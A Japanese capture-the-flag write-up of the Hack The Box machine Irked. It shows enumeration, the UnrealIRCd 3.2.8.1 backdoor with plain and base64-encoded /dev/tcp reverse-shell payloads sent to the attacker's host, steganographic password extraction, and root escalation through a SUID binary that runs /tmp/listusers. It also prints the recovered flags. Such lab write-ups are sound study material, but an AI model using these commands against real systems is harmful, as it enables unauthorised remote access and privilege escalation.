Open roaris opened 1 month ago
https://developer.mozilla.org/ja/docs/Glossary/IRC
IRC (Internet Relay Chat) は、インターネット接続と IRC サーバーを介してメッセージを送受信する IRC クライアントを必要とする世界的なチャットシステムです。
聞いたことない 111番ポートが空いてるのと関係ある?
Apache 2.4.10の脆弱性を調べたが、使えそうなのはなかった
/manual/にアクセスすると、meta refreshで/manual/en/index.htmlにリダイレクトして、Apacheのマニュアルが出てくる
$ gobuster dir --url http://10.10.10.117 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -f
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.117
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/icons/ (Status: 403) [Size: 293]
/manual/ (Status: 200) [Size: 626]
Progress: 44679 / 87665 (50.97%)[ERROR] Get "http://10.10.10.117/097524020X/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/bugreports/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000689/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000649/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000331/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 51580 / 87665 (58.84%)[ERROR] Get "http://10.10.10.117/36283/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35445/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/36281/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35949/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/36657/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/31339/": dial tcp 10.10.10.117:80: i/o timeout (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/5251/": dial tcp 10.10.10.117:80: i/o timeout (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/5777/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35456/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/32115/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
検索期間をマシン公開日(2018/11/17)より前にして、rpcbind exploitで調べたけど全く分からない
検索期間絞るのやめると、111番ポートが使われている別のマシンのwriteupが出てきた https://sanposhiho.com/posts/2020-09-06-qiita-fbb2689111821d99de85/
真似してコマンド打つ
$ nmap -p 111 -script=nfs-ls,nfs-statfs,nfs-showmount 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 21:58 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).
PORT STATE SERVICE
111/tcp open rpcbind
Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds
何も出てこなかった
https://book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind
Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.
$ rpcinfo 10.10.10.117
program version netid address service owner
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /run/rpcbind.sock portmapper superuser
100000 3 local /run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.173.17 status 107
100024 1 tcp 0.0.0.0.141.4 status 107
100024 1 udp6 ::.169.42 status 107
100024 1 tcp6 ::.209.177 status 107
addressのところはIPv6になっているのか どう見たらよいのかさっぱり分からない
詰んだので、https://www.tagnull.de/post/irked/ を見た(Guided Modeはなかった) 全ポートをスキャンするらしい
$ nmap -p- 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:16 JST
全然終わらない 仕方ないので、空いているのは6697番ポートらしいので、空いていることを確認だけして、進める
$ nmap -p 6697 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:18 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).
PORT STATE SERVICE
6697/tcp open ircs-u
Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
HexChatというIRCクライアントのツールを使うらしいが、Windowsしかインストール出来なさそうだった https://hexchat.github.io/downloads.html
なので、公式writeupを見る 公式writeupではポート8067を見つけている
$ nmap -p 8067 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:36 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).
PORT STATE SERVICE
8067/tcp open infi-async
Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
ポート8067に対して、irssiというコマンドを実行する 無かったので、インストール
$ sudo apt install irssi
$ man irssi
Irssi(1) General Commands Manual Irssi(1)
NAME
Irssi - a modular IRC client for UNIX
SYNOPSIS
irssi [--config=PATH] [--home=PATH] [-dv!?] [-c server] [-p port] [-n nickname] [-w password] [-h hostname]
DESCRIPTION
Irssi is a modular Internet Relay Chat client; it is highly extensible and very secure. Being a fullscreen,
termcap based client with many features, Irssi is easily extensible through scripts and modules.
...
これもIRCクライアントらしい
irssi -c 10.10.10.117 -p 8067
を打つと、ターミナルが占領される
exitと打つと元に戻るらしいが、戻らなかった
Irssi v1.4.5 - https://irssi.org 22:43 -!- Irssi: Looking up 10.10.10.117
22:43 -!- Irssi: The following settings were initialized
22:43 real_name
22:43 -!- Irssi: Connecting to 10.10.10.117 [10.10.10.117] port 8067
22:43 Waiting for CAP LS response...
22:43 -!- Irssi: Connection to 10.10.10.117 established
22:43 !irked.htb *** Looking up your hostname...
22:44 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
22:44 -!- Welcome to the ROXnet IRC Network roaris!roaris@10.10.14.50
22:44 -!- Your host is irked.htb, running version Unreal3.2.8.1
22:44 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
22:44 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
22:44 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32
TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server
22:44 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+
CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
STATUSMSG=~&@%+ are supported by this server
22:44 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
22:44 -!- There are 1 users and 0 invisible on 1 servers
22:44 -!- 1 unknown connection(s)
22:44 -!- I have 1 clients and 0 servers
22:44 -!- Current Local Users: 1 Max: 1
22:44 -!- Current Global Users: 1 Max: 1
22:44 -!- MOTD File is missing
22:44 -!- Mode change [+iwx] for user roaris
22:44 -!- You may not reregister
[22:45] [roaris(+iwx)] [1:10 (change with ^X)]
この出力の中のUnreal3.2.8.1に着目するらしい
UnrealIRCdというIRCデーモンがあるらしい
ちなみに、irssi -c 10.10.10.117 -p 6697
でも、Unreal3.2.8.1を見つけられた
Unreal 3.2.8.1にはバックドアが存在している CVE-2010-2075
AB;
の後に、コマンドを続けると、それが実行されるらしい
これまでは、いきなりリバースシェルを取っていたけど、まずは疎通確認からする
$ echo "AB; ping 10.10.14.50" | nc 10.10.10.117 8067
$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
23:04:09.291342 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 70, length 64
23:04:09.291363 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 70, length 64
23:04:10.290579 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 71, length 64
23:04:10.290588 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 71, length 64
23:04:11.291308 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 72, length 64
23:04:11.291330 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 72, length 64
疎通確認したのに、リバースシェルが実行できない ポート6697も駄目
$ echo "AB; bash -i >& /dev/tcp/10.10.14.50/4444 0>&1" | nc 10.10.10.117 8067
公式writeupでは、フィルターをバイパスするために、base64エンコードして、ポート65534を対象にしているが、それも駄目だった
$ echo "bash -i >& /dev/tcp/10.10.14.50/4444 0>&1" | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK
$ echo "AB; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK | base64 -d | bash" | nc 10.10.10.117 65534
マシンを再起動したらいけた base64エンコードをしないと上手くいかなかった
$ echo "AB; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK | base64 -d | bash" | nc 10.10.10.117 8067
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
$ nc -lvp 4444
listening on [any] 4444 ...
10.10.10.117: inverse host lookup failed: Unknown host
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.117] 45491
bash: cannot set terminal process group (613): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$
user.txtは見れず
ircd@irked:~/Unreal3.2$ ls -al /home
ls -al /home
total 16
drwxr-xr-x 4 root root 4096 Sep 5 2022 .
drwxr-xr-x 21 root root 4096 Sep 8 2022 ..
drwxr-xr-x 18 djmardov djmardov 4096 Sep 5 2022 djmardov
drwxr-xr-x 3 ircd root 4096 Sep 5 2022 ircd
ircd@irked:~/Unreal3.2$ ls -al /home/ircd
ls -al /home/ircd
total 16
drwxr-xr-x 3 ircd root 4096 Sep 5 2022 .
drwxr-xr-x 4 root root 4096 Sep 5 2022 ..
lrwxrwxrwx 1 root root 9 Sep 5 2022 .bash_history -> /dev/null
-rw-r--r-- 1 ircd ircd 0 May 14 2018 .bashrc
-rw-r--r-- 1 ircd ircd 66 May 14 2018 .selected_editor
drwx------ 13 ircd ircd 4096 May 25 10:21 Unreal3.2
ircd@irked:~/Unreal3.2$ ls -al /home/djmardov
ls -al /home/djmardov
total 96
drwxr-xr-x 18 djmardov djmardov 4096 Sep 5 2022 .
drwxr-xr-x 4 root root 4096 Sep 5 2022 ..
lrwxrwxrwx 1 root root 9 Nov 3 2018 .bash_history -> /dev/null
-rw-r--r-- 1 djmardov djmardov 220 May 11 2018 .bash_logout
-rw-r--r-- 1 djmardov djmardov 3515 May 11 2018 .bashrc
drwx------ 13 djmardov djmardov 4096 Sep 5 2022 .cache
drwx------ 15 djmardov djmardov 4096 Sep 5 2022 .config
drwx------ 3 djmardov djmardov 4096 Sep 5 2022 .dbus
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Desktop
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Documents
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Downloads
drwx------ 3 djmardov djmardov 4096 Sep 5 2022 .gconf
drwx------ 2 djmardov djmardov 4096 Sep 5 2022 .gnupg
-rw------- 1 djmardov djmardov 4706 Nov 3 2018 .ICEauthority
drwx------ 3 djmardov djmardov 4096 Sep 5 2022 .local
drwx------ 4 djmardov djmardov 4096 Sep 5 2022 .mozilla
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Music
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Pictures
-rw-r--r-- 1 djmardov djmardov 675 May 11 2018 .profile
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Public
drwx------ 2 djmardov djmardov 4096 Sep 5 2022 .ssh
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Templates
-rw-r----- 1 root djmardov 33 May 25 10:21 user.txt
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Videos
ircd@irked:~/Unreal3.2$ cat /home/djmardov/user.txt
cat /home/djmardov/user.txt
cat: /home/djmardov/user.txt: Permission denied
以下を試したが手掛かりを得られなかった
ircd@irked:~$ ls -al /home/ircd
ls -al /home/ircd
total 16
drwxr-xr-x 3 ircd root 4096 Sep 5 2022 .
drwxr-xr-x 4 root root 4096 Sep 5 2022 ..
lrwxrwxrwx 1 root root 9 Sep 5 2022 .bash_history -> /dev/null
-rw-r--r-- 1 ircd ircd 0 May 14 2018 .bashrc
-rw-r--r-- 1 ircd ircd 66 May 14 2018 .selected_editor
drwx------ 13 ircd ircd 4096 May 25 10:21 Unreal3.2
ircd@irked:~$ ls -al /home/djmardov
ls -al /home/djmardov
total 96
drwxr-xr-x 18 djmardov djmardov 4096 Sep 5 2022 .
drwxr-xr-x 4 root root 4096 Sep 5 2022 ..
lrwxrwxrwx 1 root root 9 Nov 3 2018 .bash_history -> /dev/null
-rw-r--r-- 1 djmardov djmardov 220 May 11 2018 .bash_logout
-rw-r--r-- 1 djmardov djmardov 3515 May 11 2018 .bashrc
drwx------ 13 djmardov djmardov 4096 Sep 5 2022 .cache
drwx------ 15 djmardov djmardov 4096 Sep 5 2022 .config
drwx------ 3 djmardov djmardov 4096 Sep 5 2022 .dbus
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Desktop
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Documents
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Downloads
drwx------ 3 djmardov djmardov 4096 Sep 5 2022 .gconf
drwx------ 2 djmardov djmardov 4096 Sep 5 2022 .gnupg
-rw------- 1 djmardov djmardov 4706 Nov 3 2018 .ICEauthority
drwx------ 3 djmardov djmardov 4096 Sep 5 2022 .local
drwx------ 4 djmardov djmardov 4096 Sep 5 2022 .mozilla
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Music
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Pictures
-rw-r--r-- 1 djmardov djmardov 675 May 11 2018 .profile
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Public
drwx------ 2 djmardov djmardov 4096 Sep 5 2022 .ssh
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Templates
-rw-r----- 1 root djmardov 33 May 25 10:21 user.txt
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Videos
ircd@irked:~$ ls -al /var/www
ls -al /var/www
total 24
drwxr-xr-x 3 root root 4096 May 14 2018 .
drwxr-xr-x 13 root root 4096 May 11 2018 ..
drwxr-xr-x 2 root root 4096 May 15 2018 html
-rw-r--r-- 1 root root 10701 May 11 2018 index.old
ircd@irked:~$ sudo -l
sudo -l
bash: sudo: command not found
ircd@irked:~$ uname -rs
uname -rs
Linux 3.16.0-6-686-pae
/home/djmardov/Documentsを見るらしい
ircd@irked:/home/djmardov$ ls -al Documents
ls -al Documents
total 12
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 .
drwxr-xr-x 18 djmardov djmardov 4096 Sep 5 2022 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
lrwxrwxrwx 1 root root 23 Sep 5 2022 user.txt -> /home/djmardov/user.txt
ircd@irked:/home/djmardov$ cat Documents/.backup
cat Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
まあこれ見ても何したら良いのか分からないけど
stegはsteganographyのことらしい 画像の中に情報を隠すやつ
ポート80番の画像を使うようだ steghideコマンドで情報を隠したり、隠した情報を取りだすことが出来る pass.txtに情報が書き出された
$ wget http://10.10.10.117/irked.jpg
$ sudo apt install steghide
$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
$ cat pass.txt
Kab6h+m+bbp2J:HG
djmardov / Kab6h+m+bbp2J:HG でsshログイン user.txtゲット
$ ssh djmardov@10.10.10.117
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ED25519 key fingerprint is SHA256:Ej828KWlDpyEOvOxHAspautgmarzw646NS31tX3puFg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ED25519) to the list of known hosts.
djmardov@10.10.10.117's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ cat user.txt
2c03fedaeeaec3288ed5d8a962d3a044
公式writeupでは、setuidが設定されたファイルを探している
djmardov@irked:~$ find / -type f -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
On listing the suid files a file /usr/bin/viewuser is noticed which isn’t present on Debian by default.
とあるけど、これだけ数あって、いきなり/usr/bin/viewuserに着目するというのは無理がある
https://sanposhiho.com/posts/2020-03-06-qiita-fe1f4b35cf74f09a6cb8/ ではlinuxprivcheckerというものを使っているので、試す
python2で動いた
djmardov@irked:~$ python3 linuxprivchecker.py > linuxprivchecker.txt
File "linuxprivchecker.py", line 74
print "[+] " + msg
^
SyntaxError: Missing parentheses in call to 'print'
djmardov@irked:~$ python2 linuxprivchecker.py > linuxprivchecker.txt
出力の数が多すぎる その中に、setuidとsetgidが設定されたファイル/ディレクトリの一覧がある(ディレクトリにsetuid, setgidを設定するってどういうこと?)
[+] SUID/SGID Files and Directories
-rwxr-sr-x 1 root mail 13680 Dec 24 2016 /usr/lib/evolution/camel-lock-helper-1.2
-rwxr-sr-x 1 root utmp 13992 Jun 23 2014 /usr/lib/libvte-2.90-9/gnome-pty-helper
-rwxr-sr-x 1 root utmp 13992 Dec 5 2014 /usr/lib/libvte-2.91-0/gnome-pty-helper
-rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter
-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
drwxrwsr-t 2 root lpadmin 4096 Sep 5 2022 /usr/share/ppd/custom
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd
-rwxr-sr-x 1 root tty 26240 Mar 29 2015 /usr/bin/wall
-rwxr-sr-x 1 root mail 17880 Nov 18 2017 /usr/bin/lockfile
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwxr-sr-x 1 root shadow 21964 May 17 2017 /usr/bin/expiry
-rwxr-sr-x 1 root tty 9680 Oct 17 2014 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9772 Dec 4 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root ssh 419192 Nov 19 2017 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
-rwxr-sr-x 1 root mail 13892 Jun 2 2013 /usr/bin/dotlockfile
-rwxr-sr-x 1 root crontab 38844 Jun 7 2015 /usr/bin/crontab
-rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwxr-sr-x 1 root mlocate 32116 Jun 13 2013 /usr/bin/mlocate
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwxr-sr-x 1 root shadow 61232 May 17 2017 /usr/bin/chage
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
drwxrwsr-x 10 root staff 4096 Sep 5 2022 /usr/local
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/include
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/etc
drwxrwsr-x 4 root staff 4096 Sep 5 2022 /usr/local/lib
drwxrwsr-x 4 root staff 4096 Sep 5 2022 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/lib/python2.7/site-packages
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/lib/python2.7/dist-packages
drwxrwsr-x 3 root staff 4096 Sep 5 2022 /usr/local/lib/python3.4
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/lib/python3.4/dist-packages
drwxrwsr-x 8 root staff 4096 Sep 5 2022 /usr/local/share
drwxrwsr-x 6 root staff 4096 Sep 5 2022 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/xml/declaration
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/xml/schema
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/man
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/ca-certificates
drwxrwsr-x 3 root staff 4096 Sep 5 2022 /usr/local/share/emacs
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/emacs/site-lisp
drwxrwsr-x 7 root staff 4096 Sep 5 2022 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/sgml/declaration
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/sgml/stylesheet
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/sgml/misc
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/fonts
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/sbin
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/bin
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/games
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/src
drwxr-s--- 2 root dip 4096 May 11 2018 /etc/chatscripts
drwxr-s--- 2 root dip 4096 May 11 2018 /etc/ppp/peers
drwxr-sr-x 29 man root 4096 May 25 10:31 /var/cache/man
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/hu
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ko
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pl
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/fr
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/de
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/gl
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ro
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sk
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/fi
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/id
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sl
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh_CN
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/cs
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ja
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/tr
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pt_BR
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/hr
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/es
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sv
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/it
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/nl
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pt
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ru
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh_TW
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/el
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/da
drwxrwsr-x 2 root mail 4096 May 11 2018 /var/mail
drwxr-s--- 2 Debian-exim adm 4096 May 25 10:26 /var/log/exim4
drwxrwsr-x 2 root staff 4096 Jan 9 2017 /var/local
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwxr-sr-x 1 root shadow 34424 May 27 2017 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
drwxr-sr-x 3 root systemd-journal 60 May 25 10:21 /run/log/journal
drwxr-s--- 2 root systemd-journal 60 May 25 10:21 /run/log/journal/58827ab6b7d24c318344087f9268b9b5
ここから、/usr/bin/viewuserに着目するなら、さっきと何も違わない /usr/bin/viewuserを怪しいと思う直感を持たないといけない
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-05-25 10:21 (:0)
djmardov pts/0 2024-05-25 13:19 (10.10.14.50)
sh: 1: /tmp/listusers: not found
/tmp/listusersがないと言われたので、とりあえず作ってみる
djmardov@irked:~$ touch /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-05-25 10:21 (:0)
djmardov pts/0 2024-05-25 13:19 (10.10.14.50)
sh: 1: /tmp/listusers: Permission denied
実行権限がなくて、Permission deniedと出ているはず 実行権限をつけると、エラーが出なくなった
djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-05-25 10:21 (:0)
djmardov pts/0 2024-05-25 13:19 (10.10.14.50)
つまり、/tmp/listusersでシェルを起動させれば、root権限でシェルが起動する root.txtゲット
djmardov@irked:~$ echo "bash -i" > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-05-25 10:21 (:0)
djmardov pts/0 2024-05-25 13:19 (10.10.14.50)
root@irked:~# pwd
/home/djmardov
root@irked:~# cd /root
root@irked:/root# cat root.txt
1eeb03bc31a3b7a53f2e391db6d86bf2
解き方まとめ
https://app.hackthebox.com/machines/Irked